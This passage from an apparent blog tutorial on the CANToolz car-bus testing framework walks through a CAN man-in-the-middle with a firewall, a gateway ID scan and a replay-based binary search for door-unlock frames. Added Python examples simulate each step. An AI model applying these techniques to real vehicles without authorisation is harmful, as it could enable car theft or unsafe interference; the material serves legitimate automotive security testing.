<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On step two, check whether the current CAN Frame from PIPE 1 is in the white list. If not, block it (remove the CAN Frame from PIPE 1).</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On step three, READ one CAN frame from the SECOND USBtin device and put it into PIPE 2.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On step four, count and save the CAN Frame for statistics (in PIPE 1).</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: arial; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 15.3333px; line-height: 1.2;">On step five, count and save the CAN Frame for statistics (in PIPE 2).</span><span style="font-size: 15.3333px; line-height: 18.4px;">
</span></span><span style="font-family: "georgia"; font-size: 15.3333px; line-height: 1.2; white-space: pre-wrap;">// here we have the same module on both PIPES, so in general we can read steps 4 and 5 as: count and save all CAN Frames from both pipes (but if a CAN Frame was blocked on step 2, then we will not see that frame).</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On step six, write the CAN Frame from PIPE 2 via the FIRST USBtin device.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On step seven, write the CAN Frame from PIPE 1 via the SECOND USBtin device.</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It may seem difficult, but in general this makes your work easier, because you "assemble" different modules into a logic... and here it is - a simple MitM that blocks all messages from the FIRST device except those that have arbitration ID 1337. </span></div>
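<div>
The seven steps above, traced in a small stand-alone model. This is an added example, not CANToolz code and not its config format: the classes Device, Firewall and Stat, the step list layout and the sample frames are all constructed for illustration, it is written for Python 3, and it touches no hardware.</div>

```python
from collections import Counter, namedtuple

Frame = namedtuple("Frame", ["can_id", "data"])


class Device:
    """Hypothetical stand-in for one USB CAN adapter (no hardware is touched)."""

    def __init__(self, incoming):
        self.rx = list(incoming)   # frames the bus will deliver to this adapter
        self.tx = []               # frames this adapter wrote back to the bus

    def handle(self, frame, action):
        if action == "read":
            # Fill the pipe only when it is empty, so nothing is overwritten.
            if frame is None and self.rx:
                return self.rx.pop(0)
            return frame
        if action == "write":
            if frame is not None:
                self.tx.append(frame)
            return frame
        raise ValueError("unknown action: %r" % (action,))


class Firewall:
    """Removes every frame whose arbitration ID is not on the white list."""

    def handle(self, frame, white_list):
        if frame is not None and frame.can_id not in white_list:
            return None            # blocked: the pipe is now empty
        return frame


class Stat:
    """Counts the frames that are still in a pipe when its step runs."""

    def __init__(self):
        self.seen = Counter()

    def handle(self, frame):
        if frame is not None:
            self.seen[frame.can_id] += 1
        return frame


def run(modules, steps, loops):
    """Run the step list `loops` times; every loop starts with empty pipes."""
    for _ in range(loops):
        pipes = {}
        for name, params in steps:
            params = dict(params)
            pipe = params.pop("pipe", 1)      # the text says pipe defaults to 1
            pipes[pipe] = modules[name].handle(pipes.get(pipe), **params)


# The seven steps from the list above, in this model's own (assumed) notation.
MITM_STEPS = [
    ("dev1", {"action": "read", "pipe": 1}),
    ("firewall", {"white_list": {1337}, "pipe": 1}),
    ("dev2", {"action": "read", "pipe": 2}),
    ("stat", {"pipe": 1}),
    ("stat", {"pipe": 2}),
    ("dev1", {"action": "write", "pipe": 2}),
    ("dev2", {"action": "write", "pipe": 1}),
]


def demo():
    """Build the modules with constructed traffic and run three loops."""
    modules = {
        "dev1": Device([Frame(256, b"\x00"), Frame(1337, b"\x2a"),
                        Frame(512, b"\x01")]),
        "dev2": Device([Frame(768, b"\x10"), Frame(769, b"\x11")]),
        "firewall": Firewall(),
        "stat": Stat(),
    }
    run(modules, MITM_STEPS, loops=3)
    return modules


if __name__ == "__main__":
    m = demo()
    print("forwarded to second device:", [f.can_id for f in m["dev2"].tx])
    print("forwarded to first device: ", [f.can_id for f in m["dev1"].tx])
    print("counted by stat:           ", dict(m["stat"].seen))
```

<div>
Because the statistics steps run after the firewall step, frames 256 and 512 from the first device never appear in the counters, which is the caveat noted on step five.</div>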
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once the config is done, run</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> cantoolz.py -g w -c mitm_config.py</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Then you will see the same config, but in the GUI (http://localhost:4444)</span></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWm1rkNU6F17tHwGHFkFBRcoY6h4pcEhxL6CLDIaYOYqkn8SDpN7QK1J7_-X6mvbNBi36NaiAnTsLy1FnDKyHClWdoNMP6qHu4zwQkCyg7ttequl4CH1r7HAJQlObexMCj8ezc5jyYqKms/s1600/mitmg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWm1rkNU6F17tHwGHFkFBRcoY6h4pcEhxL6CLDIaYOYqkn8SDpN7QK1J7_-X6mvbNBi36NaiAnTsLy1FnDKyHClWdoNMP6qHu4zwQkCyg7ttequl4CH1r7HAJQlObexMCj8ezc5jyYqKms/s1600/mitmg.png" /></a></div>
<div>
<br /></div>
<div>
<span id="docs-internal-guid-290a29cd-ba1d-374a-bead-f783b5c461ab"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Actions and steps, </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">we can see the pipes (as two columns) and the modules; by clicking on a module we can edit its parameters and send commands. The output is generated by sending a command to </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mod_stat</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
</div>
<div>
<h4>
Example 2: CAN Gateway scanner</h4>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7V84EqP87GQZOfJEn2gplwVJiYHAPbvr5y-V7RztO14LMlm8r7okmCqkSOYcaJo-_jL4OALn2_q6PDsqAjdlorgOHQrwbxF6KDS7Q4J7EXOkESRyLVRiSTHNxL6roWz02ErlSWuva4jfP/s1600/scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7V84EqP87GQZOfJEn2gplwVJiYHAPbvr5y-V7RztO14LMlm8r7okmCqkSOYcaJo-_jL4OALn2_q6PDsqAjdlorgOHQrwbxF6KDS7Q4J7EXOkESRyLVRiSTHNxL6roWz02ErlSWuva4jfP/s640/scan.png" width="640" /></a></div>
<div>
<br /></div>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Another test scenario will be about CAN Gateway. </span></div>
<span id="docs-internal-guid-290a29cd-ba1e-f1d5-9104-5f1e1a7eee44"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Let's say we want to test our CAN Gateway and find the CAN Frames that pass from the OBD2 bus to the HeadUnit/IVI. First, we connect </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">CANToolz</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> to both buses (OBD2 and IVI) and then send CAN frames from ID 1 to ID 2000 (the maximum Arbitration ID value is 2047 for 11-bit IDs, but you can use the extended format with 29 bits). After sending, we can check which of the packets we are able to read on the other bus and, finally, we can say which of the frames pass from OBD2 to HU and from HU to OBD2.</span></span><br />
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div>
Config:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsE5d5xElYQdFtk1yZT8qe_gPqOHvdlS5cy2lrt7uddUJmJAk7wsk47vrb3_-c23P9GAoOE6aVwE0s7DmKaHLS3a-lZ7qeQtX_cOSu5H1UxLv3cnZPM9j5F5UG3dqf00jn4VG2NEcQ-BF/s1600/scanc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsE5d5xElYQdFtk1yZT8qe_gPqOHvdlS5cy2lrt7uddUJmJAk7wsk47vrb3_-c23P9GAoOE6aVwE0s7DmKaHLS3a-lZ7qeQtX_cOSu5H1UxLv3cnZPM9j5F5UG3dqf00jn4VG2NEcQ-BF/s640/scanc.png" width="640" /></a></div>
<div>
GUI:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBQkBONQVvqZj4b_g18cCu7hmrjtHckVFJzq_nMxRuqbkBdwaBkQLwxbvbkGhULk_g_LaksAx_ZnirnX_SCFZqp-J2SG-AAb5WuGPK5LZZ9mpsAes0-B2ayqLV1NEgGK6s6coC853N2B5/s1600/scang1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBQkBONQVvqZj4b_g18cCu7hmrjtHckVFJzq_nMxRuqbkBdwaBkQLwxbvbkGhULk_g_LaksAx_ZnirnX_SCFZqp-J2SG-AAb5WuGPK5LZZ9mpsAes0-B2ayqLV1NEgGK6s6coC853N2B5/s1600/scang1.png" /></a></div>
<div>
<br /></div>
<span id="docs-internal-guid-290a29cd-ba1f-f0c6-1ad5-328db89a6245"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span id="docs-internal-guid-290a29cd-ba1f-f0c6-1ad5-328db89a6245"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Here we just switch to </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">gen_ping </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">and activate this module (by default it is not active). The module will then generate 2000 frames with different IDs, but with the same data field: "\x01\x02\x03\x04\x05\x06\x07\x08". The USBtin devices (on both pipes) will then receive those frames that are not blocked by the CAN Gateway. </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">mod_firewall </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">cleans the pipes of all other frames, since we are interested only in the frames that we generated and that passed the CAN gateway. Filtering here is done by data field. Finally, just switch to </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">mod_stat </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">and see which of the frames have not been filtered:</span></span></div>
<span id="docs-internal-guid-290a29cd-ba1f-f0c6-1ad5-328db89a6245">
</span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8xshxmi3XaYhGjL_mC_6kwYvXcZG_JYxg02hibWIeLEO4eYYtAhVwbjJ_O5aBYCq5LIQJ6VL_M5pniKyn747g2aohJuvvFZFOuoatd2pb1TvVpPAQ2IT5Y_w88tfu2o_aBFgmPtqIQWpy/s1600/scang2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8xshxmi3XaYhGjL_mC_6kwYvXcZG_JYxg02hibWIeLEO4eYYtAhVwbjJ_O5aBYCq5LIQJ6VL_M5pniKyn747g2aohJuvvFZFOuoatd2pb1TvVpPAQ2IT5Y_w88tfu2o_aBFgmPtqIQWpy/s1600/scang2.png" /></a></div>
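<div>
The same scan against a simulated gateway, with the result compared to the forwarding policy the gateway is supposed to enforce. This is an added example in Python 3, not CANToolz code: SimulatedGateway, its rule sets, the background traffic and the expected policy are constructed, and only the marker data field and the ID range come from the text above.</div>

```python
from collections import namedtuple

Frame = namedtuple("Frame", ["can_id", "data"])

MARKER = b"\x01\x02\x03\x04\x05\x06\x07\x08"   # data field of the generated frames
MAX_STD_ID = 0x7FF                              # 2047, largest 11-bit arbitration ID


class SimulatedGateway:
    """Constructed stand-in for a CAN gateway: one forwarding list per direction."""

    def __init__(self, obd_to_ivi, ivi_to_obd):
        self.rules = {("obd", "ivi"): frozenset(obd_to_ivi),
                      ("ivi", "obd"): frozenset(ivi_to_obd)}

    def forward(self, frame, src, dst):
        return frame if frame.can_id in self.rules[(src, dst)] else None


def ping_frames(first=1, last=2000):
    """One marker frame per arbitration ID in [first, last], 11-bit IDs only."""
    if not 0 <= first <= last <= MAX_STD_ID:
        raise ValueError("11-bit arbitration IDs must stay within 0..2047")
    return [Frame(can_id, MARKER) for can_id in range(first, last + 1)]


def scan_direction(gateway, src, dst, background=(), first=1, last=2000):
    """Send marker frames on `src`, return the IDs that show up on `dst`."""
    seen_on_dst = list(background)          # normal traffic already on that bus
    for frame in ping_frames(first, last):
        out = gateway.forward(frame, src, dst)
        if out is not None:
            seen_on_dst.append(out)
    # Filter by data field: background frames are dropped even when their ID
    # matches, only frames carrying the marker count as "passed the gateway".
    return sorted({f.can_id for f in seen_on_dst if f.data == MARKER})


def audit(gateway, expected, background, first=1, last=2000):
    """Compare what passes in each direction with the intended policy."""
    report = {}
    for (src, dst), allowed in expected.items():
        passed = set(scan_direction(gateway, src, dst,
                                    background.get(dst, ()), first, last))
        report[(src, dst)] = {
            "passed": sorted(passed),
            "unexpected": sorted(passed - set(allowed)),
            "missing": sorted(set(allowed) - passed),
        }
    return report


# Constructed test bench: the gateway forwards more than the policy intends.
GATEWAY = SimulatedGateway(obd_to_ivi={256, 580, 2015}, ivi_to_obd={1000})
EXPECTED = {("obd", "ivi"): {256}, ("ivi", "obd"): {1000}}
BACKGROUND = {
    "ivi": [Frame(580, b"\xde\xad"), Frame(700, b"\x00" * 8)],
    "obd": [Frame(1000, b"\xff")],
}

if __name__ == "__main__":
    for direction, result in audit(GATEWAY, EXPECTED, BACKGROUND).items():
        print(direction, result)
    # IDs 2001..2047 are outside the 1..2000 sweep; widen it to cover them.
    print(scan_direction(GATEWAY, "obd", "ivi", BACKGROUND["ivi"], last=MAX_STD_ID))
```

<div>
In this constructed bench ID 2015 is forwarded but only shows up when the sweep is widened to 2047, so a 1..2000 scan does not cover the whole 11-bit range.</div>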
<div>
<br /></div>
<div>
<h4>
Example 3: Replay traffic</h4>
</div>
<div style="text-align: justify;">
<span id="docs-internal-guid-290a29cd-ba20-6d46-3976-e4daa20b4b0c"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-290a29cd-ba20-6d46-3976-e4daa20b4b0c"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">This example is taken from the </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Car Hacker's Handbook. </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Here you will find out</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">how to find the CAN frames that are used for door-unlock. This is going to be simple: sniff the traffic while you perform the unlock, then replay this traffic. Remember that the traffic contains a lot of other frames. If all is OK, replay half of this traffic: if the event happens, then our frames are in that half; if not, they are in the other. Continue this "binary search" until you find the needed frames. </span></span></div>
<span id="docs-internal-guid-290a29cd-ba20-6d46-3976-e4daa20b4b0c">
</span> Let's repeat this test scenario in <b>CANToolz</b>:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifWUbsqjWZ8rdzskyGrA0Yf-ilzlRJYRWYCF0GFGk9uT-YNuZz5HJ5DG6l-b1e6qpzSL6gAjH87pvuPTaaN-CnPcCwZvbRc_6G8Z1L7E28sJ9bIABBgNEhvhMS5gWDf8Ltz5ysxQ2y0HuV/s1600/replayc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifWUbsqjWZ8rdzskyGrA0Yf-ilzlRJYRWYCF0GFGk9uT-YNuZz5HJ5DG6l-b1e6qpzSL6gAjH87pvuPTaaN-CnPcCwZvbRc_6G8Z1L7E28sJ9bIABBgNEhvhMS5gWDf8Ltz5ysxQ2y0HuV/s640/replayc.png" width="640" /></a></div>
<span id="docs-internal-guid-290a29cd-ba20-ecbc-2071-ce5655e03028"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Run CANToolz and enable sniff mode, then perform the "unlock action".</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvVgCt9Z0Oq_tjAHdOtqsIObK1tCBZtABisxs7vZnFBQ9XRhbG4nAsFQXqk5P4Rlo1pM6356-UJ-Djpoe0Y4Y-w3nMoW2sRdrJDPLPy9u42dRirhYHwjIY-Ur71WBILDYb4hT0xZuiChc/s1600/replayg1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvVgCt9Z0Oq_tjAHdOtqsIObK1tCBZtABisxs7vZnFBQ9XRhbG4nAsFQXqk5P4Rlo1pM6356-UJ-Djpoe0Y4Y-w3nMoW2sRdrJDPLPy9u42dRirhYHwjIY-Ur71WBILDYb4hT0xZuiChc/s1600/replayg1.png" /></a></div>
<br />
<br />
<span id="docs-internal-guid-290a29cd-ba21-7012-77be-cbf2cdccae4b"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 12pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After that, stop sniffing mode and see the number of gathered frames. If you want to replay those frames, you have to switch module </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_replay</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the second PIPE...</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56FMZa8gY715KgAHXGKAzYuNepeawRQ2rRFQUUxyl0STJXgrRwWFj9ap5yaR5ykY6H63ONiO8af2H0mZFJ7NTd5m3lFjp_MprQCmLXTwZbRbigH-FGU-aLr3L5mjLIO2Iz-naQDBwL91p/s1600/replayg12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56FMZa8gY715KgAHXGKAzYuNepeawRQ2rRFQUUxyl0STJXgrRwWFj9ap5yaR5ykY6H63ONiO8af2H0mZFJ7NTd5m3lFjp_MprQCmLXTwZbRbigH-FGU-aLr3L5mjLIO2Iz-naQDBwL91p/s1600/replayg12.png" /></a></div>
<br />
<br />
Then let's start a binary search through replaying!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieg3Y6LqRVnFUjl4jSEj_omZiwyemkM0r844JMF5myHwxFVKPy6zXbplD4uBxICkqkJRS5dGxZ_cXbSA2upICw9y7f3y9eFRAr6CzyJjhENl06Wb-FSpyjPtxM83rkymim-lmlMTBowEu6/s1600/replayg2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieg3Y6LqRVnFUjl4jSEj_omZiwyemkM0r844JMF5myHwxFVKPy6zXbplD4uBxICkqkJRS5dGxZ_cXbSA2upICw9y7f3y9eFRAr6CzyJjhENl06Wb-FSpyjPtxM83rkymim-lmlMTBowEu6/s1600/replayg2.png" /></a></div>
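The binary search described above, as an added example that is not CANToolz code and not from the original post. The `reproduces` callback is a hypothetical stand-in for "replay this slice on the bench and watch for the action", the frames are constructed, and the search assumes the action depends only on which frames are replayed and in what order; it also covers the case where the action needs frames from both halves of the capture.

```python
"""Binary search over a captured CAN log to find the frames behind an observed action."""


def last_true(good, bad, pred):
    """pred(good) holds and pred(bad) does not: return the largest index where it holds."""
    while bad - good > 1:
        mid = (good + bad) // 2
        if pred(mid):
            good = mid
        else:
            bad = mid
    return good


def first_true(bad, good, pred):
    """pred(bad) does not hold and pred(good) does: return the smallest index where it holds."""
    while good - bad > 1:
        mid = (good + bad) // 2
        if pred(mid):
            good = mid
        else:
            bad = mid
    return good


def isolate_window(frames, reproduces):
    """Return (start, end) of the smallest slice frames[start:end] that still reproduces.

    reproduces(subset) is a hypothetical callback: replay the subset on the bench
    and report whether the action was observed.
    """
    lo, hi = 0, len(frames)
    if not reproduces(frames):
        raise ValueError("the full capture does not reproduce the action")
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if reproduces(frames[lo:mid]):
            hi = mid                      # the first half is enough
        elif reproduces(frames[mid:hi]):
            lo = mid                      # the second half is enough
        else:
            # The action needs frames from both halves (for example a wake-up
            # frame followed by a command), so tighten each edge on its own.
            lo = last_true(lo, mid, lambda s: reproduces(frames[s:hi]))
            hi = first_true(mid, hi, lambda e: reproduces(frames[lo:e]))
            break
    return lo, hi


class SimulatedBench:
    """Constructed stand-in for a bench: the action fires when every frame in
    `needed` is replayed, in order. Counts how many replays were required."""

    def __init__(self, needed):
        self.needed = list(needed)
        self.replays = 0

    def __call__(self, subset):
        self.replays += 1
        remaining = iter(subset)
        # Ordered-subsequence check: each lookup consumes the iterator.
        return all(frame in remaining for frame in self.needed)


def build_capture(count, specials):
    """Constructed capture: unique background frames plus {index: frame} specials."""
    return [specials.get(i, "%03X#%016X" % (0x100 + i % 5, i)) for i in range(count)]


WAKE = "2A0#0100000000000000"     # constructed frames, not taken from a real vehicle
COMMAND = "2A0#0500000000000000"

if __name__ == "__main__":
    bench = SimulatedBench([COMMAND])
    capture = build_capture(200, {137: COMMAND})
    print(isolate_window(capture, bench), "after", bench.replays, "replays")

    bench = SimulatedBench([WAKE, COMMAND])
    capture = build_capture(200, {90: WAKE, 137: COMMAND})
    print(isolate_window(capture, bench), "after", bench.replays, "replays")
```

On a real bus the answer also depends on timing and on state such as counters inside the frames, so a window found this way should be replayed several times before it is trusted.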
<div>
<br /></div>
<div>
<h4>
Another example: Scan, ISO-TP, UDS...</h4>
</div>
<div>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Another interesting topic is finding UDS modes, CAN "commands" and features that do not appear in the traffic (so you can't sniff them, at least not so easily...). Moreover, I should say that fuzzing is an interesting thing - maybe not for finding "bugs", but for understanding what the "bytes" in the data section mean. Anyway, fuzzing without any information about the CAN frame can be dangerous. Do not do mass fuzzing of random IDs, etc. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now, you see that we have </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_ping </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for generating packets and </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_fuzz </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for fuzzing DATA - both modules support the ISO-TP format, and </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_ping</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; 